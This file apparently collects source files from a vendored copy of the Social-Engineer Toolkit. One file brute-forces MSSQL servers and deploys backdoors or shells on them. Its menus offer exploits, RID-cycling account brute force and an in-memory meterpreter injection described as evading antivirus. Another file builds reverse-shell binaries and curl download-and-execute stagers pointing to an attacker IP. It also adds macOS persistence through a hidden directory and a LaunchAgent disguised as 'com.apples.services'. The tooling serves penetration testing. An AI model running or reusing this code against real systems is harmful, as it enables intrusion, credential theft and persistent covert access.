"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath))
print_status(
"File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino")
return_continue()
# if we are doing the X10 Arduino Sniffer
if teensy_menu_choice == "10":
print_status(
"Generating the Arduino sniffer and libraries ino..")
if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"):
os.makedirs(userconfigpath + "reports/arduino_sniffer")
shutil.copyfile("src/teensy/x10/x10_sniffer.ino",
userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino")
shutil.copyfile("src/teensy/x10/libraries.zip",
userconfigpath + "reports/arduino_sniffer/libraries.zip")
print_status(
"Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer")
return_continue()
# if we are doing the X10 Jammer
if teensy_menu_choice == "11":
print_status(
"Generating the Arduino jammer ino and libraries...")
if not os.path.isdir(userconfigpath + "reports/arduino_jammer"):
os.makedirs(userconfigpath + "reports/arduino_jammer")
shutil.copyfile("src/teensy/x10/x10_blackout.ino",
userconfigpath + "reports/arduino_jammer/x10_blackout.ino")
shutil.copyfile("src/teensy/x10/libraries.zip",
userconfigpath + "reports/arduino_jammer/libraries.zip")
print_status(
"Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer")
return_continue()
# powershell shellcode injection
if teensy_menu_choice == "12":
print_status(
"Generating the Powershell - Shellcode injection ino..")
debug_msg(
me, "importing 'src.teensy.powershell_shellcode'", 1)
import src.teensy.powershell_shellcode
# HID Msbuild compile to memory Shellcode Attack
if teensy_menu_choice == "14":
print_status(
"HID Msbuild compile to memory Shellcode Attack selected")
debug_msg(
me, "importing '-----file-----'", 1)
import src.teensy.ino_gen
if teensy_menu_choice == "0":
teensy_menu_choice = None
#
# Main Menu choice 8: Wireless Attack Point Attack Vector
#
if main_menu_choice == '7':
if operating_system == "windows":
print_warning(
"Sorry. The wireless attack vector is not yet supported in Windows.")
return_continue()
if operating_system != "windows":
# set path to nothing
airbase_path = ""
dnsspoof_path = ""
# need to pull the SET config file
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("AIRBASE_NG_PATH=", line)
if match:
airbase_path = line.replace("AIRBASE_NG_PATH=", "")
match1 = re.search("DNSSPOOF_PATH=", line)
if match1:
dnsspoof_path = line.replace("DNSSPOOF_PATH=", "")
if not os.path.isfile(airbase_path):
if not os.path.isfile("/usr/local/sbin/airbase-ng"):
print_warning(
"Warning airbase-ng was not detected on your system. Using one in SET.")
print_warning(
"If you experience issues, you should install airbase-ng on your system.")
print_warning(
"You can configure it through the set_config and point to airbase-ng.")
airbase_path = ("src/wireless/airbase-ng")
if os.path.isfile("/usr/local/sbin/airbase-ng"):
airbase_path = "/usr/local/sbin/airbase-ng"
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/local/sbin/dnsspoof"):
dnsspoof_path = "/usr/local/sbin/dnsspoof"
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
# if we can find airbase-ng
if os.path.isfile(airbase_path):
if os.path.isfile(dnsspoof_path):
# start the menu here
while 1:
#
# USER INPUT: SHOW WIRELESS MENU #
#
debug_msg(
me, "printing 'text.wireless_attack_menu'", 5)
show_wireless_menu = create_menu(
text.wireless_attack_text, text.wireless_attack_menu)
wireless_menu_choice = raw_input(
setprompt(["8"], ""))
# if we want to start access point
if wireless_menu_choice == "1":
sys.path.append(definepath + "/src/wireless/")
debug_msg(
me, "importing 'src.wireless.wifiattack'", 1)
try:
module_reload(wifiattack)
except:
import wifiattack
# if we want to stop the wifi attack
if wireless_menu_choice == "2":
sys.path.append(definepath + "/src/wireless/")
debug_msg(
me, "importing 'src.wireless.stop_wifiattack'", 1)
try:
module_reload(stop_wifiattack)
except:
import stop_wifiattack
# if we want to return to the main menu
if wireless_menu_choice == "0":
print (" [*] Returning to the main menu ...")
break
if not os.path.isfile(dnsspoof_path):
if not os.path.isfile("/usr/local/sbin/dnsspoof"):
print_error(
"ERROR:DNS Spoof was not detected. Check the set_config file.")
return_continue()
#
# END WIFI ATTACK MODULE
#
# Main Menu choice 9: QRCode Generator
if main_menu_choice == '8':
try:
from PIL import Image, ImageDraw
from src.qrcode.qrgenerator import *
print("""
The QRCode Attack Vector will create a QRCode for you with whatever URL you want.
When you have the QRCode Generated, select an additional attack vector within SET and
deploy the QRCode to your victim. For example, generate a QRCode of the SET Java Applet
and send the QRCode via a mailer.
""")
url = raw_input(
"Enter the URL you want the QRCode to go to (0 to exit): ")
if url != "0":
# if the reports directory does not exist then create it
if not os.path.isdir("%s/reports" % (userconfigpath)):
os.makedirs("%s/reports" % (userconfigpath))
gen_qrcode(url)
return_continue()
except ImportError:
print_error(
"This module requires PIL (Or Pillow) and qrcode to work properly.")
print_error(
"Just do pip install Pillow; pip install qrcode")
print_error(
"Else refer to here for installation: http://pillow.readthedocs.io/en/3.3.x/installation.html")
return_continue()
# Main Menu choice 9: PowerShell Attacks
if main_menu_choice == '9':
try:
module_reload(src.powershell.powershell)
except:
import src.powershell.powershell
# Main Menu choice 11: Third Party Modules
if main_menu_choice == '10':
sys.path.append(definepath + "/src/core")
debug_msg(me, "importing 'src.core.module_handler'", 1)
try:
module_reload(module_handler)
except:
import module_handler
# Main Menu choice 0: Exit the Social-Engineer Toolkit
if main_menu_choice == '0':
break
# handle keyboard interrupts
except KeyboardInterrupt:
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
" with the Social-Engineer Toolkit.\n\n Hack the Gibson...and remember...hugs are worth more than handshakes.\n")
| 58,101 | Python | .py | 1,042 | 31.09501 | 290 | 0.42949 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,838 | fasttrack.py | CHEGEBB_africana-framework/externals/set/src/core/fasttrack.py | #!/usr/bin/env python3
from src.core.setcore import *
from src.core.menu import text
import subprocess
from multiprocessing.dummy import Pool as ThreadPool
definepath = os.getcwd()
try: input = raw_input
except: pass
#
#
# Fast-Track Main options and interface menus
#
#
try:
while 1:
#
# USER INPUT: SHOW WEB ATTACK MENU #
#
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
if attack_vector == "0" or attack_vector == "quit" or attack_vector == "exit":
break
#
#
# mssql_scanner
#
#
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print(
"\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1":
if choice != "2":
if choice != "":
print_error(
"You did not specify 1 or 2! Please try again.")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
if choice == "":
choice = "1"
if choice == "1":
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR, single IP, or multiple IPs seperated by space (ex. 192.168.1.1/24)"))
if choice == "2":
while 1:
range = raw_input(setprompt(
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
if not os.path.isfile(range):
print_error(
"File not found! Please type in the path to the file correctly.")
else:
break
if choice == "1":
port = "1433"
if choice == "2":
port = "1433"
# ask for a wordlist
wordlist = raw_input(setprompt(
["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "":
wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "":
username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status(
"If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = ''
print_status("Hunting for SQL servers.. This may take a little bit.")
if "/" or " " in str(range):
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
pool = ThreadPool(200)
sqlport = pool.map(get_sql_port, iprange)
pool.close()
pool.join()
for sql in sqlport:
if sql != None:
if sql != "":
sql_servers = sql_servers + sql + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport != None:
if sqlport != "":
sql_servers = sql_servers + sqlport + ","
else:
# use udp discovery to get the SQL server UDP 1434
sqlport = get_sql_port(range)
# if its not closed then check nmap - if both fail then
# nada
if sqlport != None:
if sqlport != "":
sql_servers = sqlport + ","
# specify choice 2
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning(
"Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status(
"Atta boy. Found the file this time. Moving on.")
break
fileopen = open(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line = line.rstrip()
sql_servers = sql_servers + line + ","
# this will hold all of the SQL servers eventually
master_list = ""
# set a base counter
counter = 0
# if we specified a username list
if os.path.isfile(username):
usernames = open(username, "r")
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
print_status("The following SQL servers and associated ports were identified:\n")
for sql in sql_servers:
if sql != "":
print(sql)
if len(sql_servers) > 2:
print_status("By pressing enter, you will begin the brute force process on all SQL accounts identified in the list above.")
test = input("Press {enter} to begin the brute force process.")
for servers in sql_servers:
# this will return the following format ipaddr + "," +
# username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + \
sql_success + ":"
counter = 1
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(
servers, users, port, wordlist)
# we wont break out of the loop here incase
# theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + \
sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
if sql_servers:
print_warning(
"Sorry. Unable to locate or fully compromise a MSSQL Server on the following SQL servers: ")
else:
print_warning(
"Sorry. Unable to find any SQL servers to attack.")
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status(
"SET Fast-Track attacked the following SQL servers: ")
for line in sql_servers:
if line != "":
print("SQL Servers: " + line.rstrip())
print_status(
"Below are the successfully compromised systems.\nSelect the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
print(" " + str(counter) + ". " + success)
# increment counter
counter = counter + 1
print("\n 0. Return back to the main menu.\n")
# select the server to interact with
select_server = raw_input(
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit":
break
if select_server == "":
select_server = "1"
if select_server == "0":
break
counter = 1
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) +
# "," + passwords
print(
"\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 0. Return back to the main menu.\n")
option = raw_input(
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
if option == "":
option = "1"
# if 0 then break
if option == "0":
break
# specify we are using the fasttrack
# option, this disables some features
filewrite = open(
userconfigpath + "fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1":
# import payloads for selection and
# prep
mssql.deploy_hex2binary(
success[0], success[2], success[1], success[3])
# straight up connect
if option == "2":
mssql.cmdshell(success[0], success[2], success[
1], success[3], option)
# increment counter
counter = counter + 1
#
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(
["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(
setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
if sql_port == "":
sql_port = "1433"
sql_username = raw_input(
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "":
sql_username = "sa"
sql_password = raw_input(
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
import _mssql
conn = _mssql.connect(
sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1
except Exception as e:
print(e)
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status(
"Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status(
"Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print("\n")
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print(data)
except Exception as e:
print_warning(
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
#
#
# exploits menu
#
#
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1,
text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(
setprompt(["19", "24"], "Select the number of the exploit you want"))
# ms08067
if range == "1":
try:
module_reload(src.fasttrack.exploits.ms08067)
except:
import src.fasttrack.exploits.ms08067
# firefox 3.6.16
if range == "2":
try:
module_reload(src.fasttrack.exploits.firefox_3_6_16)
except:
import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try:
module_reload(src.fasttrack.exploits.solarwinds)
except:
import src.fasttrack.exploits.solarwinds
# rdp DoS
if range == "4":
try:
module_reload(src.fasttrack.exploits.rdpdos)
except:
import src.fasttrack.exploits.rdpdos
if range == "5":
try:
module_reload(src.fasttrack.exploits.mysql_bypass)
except:
import src.fasttrack.exploits.mysql_bypass
if range == "6":
try:
module_reload(src.fasttrack.exploits.f5)
except:
import src.fasttrack.exploits.f5
#
#
# sccm attack menu
#
#
if attack_vector == "3":
# load sccm attack
try:
module_reload(src.fasttrack.sccm.sccm_main)
except:
import src.fasttrack.sccm.sccm_main
#
#
# dell drac default credential checker
#
#
if attack_vector == "4":
# load drac menu
subprocess.Popen("python3 %s/src/fasttrack/delldrac.py" %
(definepath), shell=True).wait()
#
#
# RID ENUM USER ENUMERATION
#
#
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
""")
print(
"\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print("\n")
ipaddr = raw_input(
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "0" or ipaddr == "quit" or ipaddr == "exit":
break
print_status(
"Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
filewrite = open(userconfigpath + "dictionary.txt", "w")
filewrite.write("\nPassword1\nPassword!\nlc username")
# specify the path
dict = userconfigpath + "dictionary.txt"
filewrite.close()
# if we are not brute forcing
if dict.lower() == "no":
print_status("No problem, not brute forcing user accounts")
dict = ""
if dict != "":
print_warning(
"You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status(
"Okay. Not brute forcing user accounts *phew*.")
dict = ""
# next we see what rid we want to start
start_rid = raw_input(
setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "":
start_rid = "500"
# stop rid
stop_rid = raw_input(
setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "":
stop_rid = "15000"
print_status(
"Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python3 src/fasttrack/ridenum.py %s %s %s %s" %
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
# once we are finished, prompt.
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.")
#
#
# PSEXEC PowerShell
#
#
if attack_vector == "6":
print(
"\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
try:
module_reload(src.fasttrack.psexec)
except:
import src.fasttrack.psexec
# handle keyboard exceptions
except KeyboardInterrupt:
pass
| 23,819 | Python | .py | 461 | 30.498915 | 468 | 0.422991 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,839 | payloadprep.py | CHEGEBB_africana-framework/externals/set/src/core/payloadprep.py | #!/usr/bin/env python3
############################################
# Code behind the SET interactive shell and RATTE
############################################
import os
import sys
import subprocess
import re
import shutil
import time
from src.core.setcore import *
definepath = os.getcwd()
sys.path.append(definepath)
# grab operating system
operating_system = check_os()
# check the config file
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
# define if we use upx encoding or not
match = re.search("UPX_ENCODE=", line)
if match:
upx_encode = line.replace("UPX_ENCODE=", "")
# set the upx flag
match1 = re.search("UPX_PATH=", line)
if match1:
upx_path = line.replace("UPX_PATH=", "")
if upx_encode == "ON":
if not os.path.isfile(upx_path):
if operating_system != "windows":
print_warning(
"UPX packer not found in the pathname specified in config. Disabling UPX packing for executable")
upx_encode == "OFF"
# if we removed the set shells to free up space, needed for pwniexpress
match2 = re.search("SET_INTERACTIVE_SHELL=", line)
if match2:
line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
if line == "off":
sys.exit(
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
# make directory if it's not there
if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(userconfigpath + "web_clone/")
# grab ip address and SET web server interface
if os.path.isfile(userconfigpath + "interface"):
fileopen = open(userconfigpath + "interface", "r")
for line in fileopen:
ipaddr = line.rstrip()
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(
setprompt("0", "IP address to connect back on for the reverse listener"))
update_options("IPADDR=" + ipaddr)
webserver = ipaddr
else:
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(
setprompt("0", "IP address to connect back on for the reverse listener"))
update_options("IPADDR=" + ipaddr)
webserver = ipaddr
# grab port options from payloadgen.py
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = raw_input(
setprompt("0", "Port you want to use for the connection back"))
# define the main variables here
# generate a random executable name per instance
exe_name = generate_random_string(10, 10) + ".exe"
webserver = webserver + " " + port
# store for later
reverse_connection = webserver
webserver = exe_name + " " + webserver
# this is generated through payloadgen.py and lets SET know if its a RATTE
# payload or SET payload
if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen:
payload_selection = line.rstrip()
else:
payload_selection = "SETSHELL"
# determine if we want to target osx/nix as well
posix = False
# find if we selected it
if os.path.isfile(userconfigpath + "set.payload.posix"):
# if we have then claim true
posix = True
# if we selected the SET Interactive shell in payloadgen
if payload_selection == "SETSHELL":
# replace ipaddress with one that we need for reverse connection back
fileopen = open("src/payloads/set_payloads/downloader.windows", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(exe_name) + 1) * "X"
webserver_count = int(len(webserver) + 1) * "S"
ipaddr_count = int(len(ipaddr) + 1) * "M"
filewrite.write(data.replace(str(host), exe_name + "\x00", 1))
filewrite.close()
fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1))
filewrite.close()
fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1))
filewrite.close()
# if we selected RATTE in our payload selection
if payload_selection == "RATTE":
fileopen = open("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(ipaddr) + 1) * "X"
rPort = int(len(str(port)) + 1) * "Y"
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
filewrite.close()
fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read()
filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1))
filewrite.close()
print_status("Done, moving the payload into the action.")
if upx_encode == "ON" or upx_encode == "on":
# core upx
pass
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(userconfigpath + "web_clone/msf.exe")
if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe")
if payload_selection == "SETSHELL":
if os.path.isfile(userconfigpath + "web_clone/x"):
os.remove(userconfigpath + "web_clone/x")
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" %
(definepath), userconfigpath + "web_clone/x")
# if we are targetting nix
if posix == True:
print_info(
"Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
filewrite = open(userconfigpath + "web_clone/mac.bin", "w")
payload_flags = webserver.split(" ")
# grab osx binary name
osx_name = generate_random_string(10, 10)
downloader = "#!/bin/sh\ncurl -C -O http://%s/%s > /tmp/%s\nchmod +x /tmp/%s\n./tmp/%s %s %s &" % (
payload_flags[1], osx_name, osx_name, osx_name, osx_name, payload_flags[1], payload_flags[2])
filewrite.write(downloader + "\n")
persistence = check_config("ENABLE_PERSISTENCE_OSX=").lower()
if persistence == "on":
# modified persistence osx from
# http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
filewrite.write(r"mkdir ~/Library/.hidden")
filewrite.write("\n")
filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
filewrite.write("\n")
filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
filewrite.write("\n")
filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" %
(osx_name, payload_flags[1], payload_flags[2]))
filewrite.write("\n")
filewrite.write(
r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
filewrite.write("\n")
filewrite.write(r"mkdir ~/Library/LaunchAgents")
filewrite.write("\n")
filewrite.write(
"echo '<plist version=\"1.0\">' > ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>Label</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<string>com.apples.services</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>ProgramArguments</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<string>/bin/sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
"echo '<string>'$HOME'/Library/.hidden/connect.sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '</array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>RunAtLoad</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>StartInterval</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<integer>60</integer>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<key>AbandonProcessGroup</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '</dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"echo '</plist>' >> ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.write("\n")
filewrite.write(
r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
filewrite.close()
# grab nix binary name
#linux_name = check_options("NIX.BIN=")
linux_name = generate_random_string(10, 10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2])
filewrite = open(userconfigpath + "web_clone/nix.bin", "w")
filewrite.write(downloader)
filewrite.close()
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx",
userconfigpath + "web_clone/%s" % (osx_name))
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux",
userconfigpath + "web_clone/%s" % (linux_name))
# copy over the downloader scripts
osx_down = check_options("MAC.BIN=")
lin_down = check_options("NIX.BIN=")
shutil.copyfile(userconfigpath + "web_clone/nix.bin",
userconfigpath + "web_clone/%s" % (lin_down))
shutil.copyfile(userconfigpath + "web_clone/mac.bin",
userconfigpath + "web_clone/%s" % (osx_down))
# check to see if we are using a staged approach or direct shell
stager = check_config("SET_SHELL_STAGER=").lower()
if stager == "off" or payload_selection == "SETSHELL_HTTP":
# only trigger if we are using the SETSHELL
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
# ensure that index.html is really there
if os.path.isfile(userconfigpath + "web_clone/index.html"):
print_status(
"Stager turned off, prepping direct download payload...")
fileopen = open(userconfigpath + "web_clone/index.html", "r")
filewrite = open(userconfigpath + "web_clone/index.html.3", "w")
data = fileopen.read()
# replace freehugs with ip and port
data = data.replace("freehugs", reverse_connection)
filewrite.write(data)
filewrite.close()
time.sleep(1)
# here we remove old stuff and replace with everything we need to
# be newer
if payload_selection == "SETSHELL":
try:
if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
userconfigpath + "web_clone/index.html")
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile(userconfigpath + "web_clone/x",
userconfigpath + "web_clone/msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(userconfigpath + "msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later
except Exception as error:
log(error)
# if we are using the HTTP reverse shell then lets use this
if payload_selection == "SETSHELL_HTTP":
try:
if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(userconfigpath + "web_clone/index.html")
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
userconfigpath + "web_clone/index.html")
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
os.remove(userconfigpath + "web_clone/index.html.3")
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(userconfigpath + "web_clone/msf.exe")
shutil.copyfile(
"src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
if os.path.isfile(userconfigpath + "msf.exe"):
os.remove(userconfigpath + "msf.exe")
shutil.copyfile(
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
# catch errors, will convert to log later
except Exception as error:
log(error)
